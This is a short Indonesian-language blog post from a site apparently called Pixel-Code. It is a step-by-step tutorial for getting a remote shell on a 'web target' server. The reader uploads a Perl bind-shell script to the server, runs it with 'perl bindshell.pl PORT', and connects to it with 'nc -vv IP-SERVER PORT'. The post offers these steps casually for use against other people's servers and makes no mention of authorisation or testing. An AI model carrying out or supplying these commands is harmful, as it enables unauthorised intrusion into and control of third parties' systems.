BackConnect With BindShell Netcat - Pixel-Code

BackConnect With BindShell Netcat

Hallo sobat pixel kali ini gue mau bagiin gimana caranya sih backconnect with netcat bindshell, ini sebenernya trik lama yo bagi yang belum tahu simak aja gimana sih stepnya:
Bahan-Bahan:
Web target
Netcat
Script bindshell here

Langsung aja pertama kalian upload script bindshell dahulu, jika sudah diupload kalian lihat ip server target kalian dan pilih port yang kalian inginkan, dan kalian setting di command netcat "nc -vv IP-SERVER PORT" dan jangan kalian tekan enter atau eksekusi.

Jika sudah kalian setting, kalian kembali ke shell dan jalankan script bindshellnya, Gimana kak run nya? command "perl bindshell.pl PORT" (Nb. port samakan dengan yang kalian setting sebelumnya)

Jika sudah run script kalian boleh tekan enter netcat kalian dan tunggu, and boom bindshell success hehe

Gimana? cukup mudah bukan bukan? Oke mungkin cukup sekian dont forget too share and see you next time~

0 Response to "BackConnect With BindShell Netcat"

Post a Comment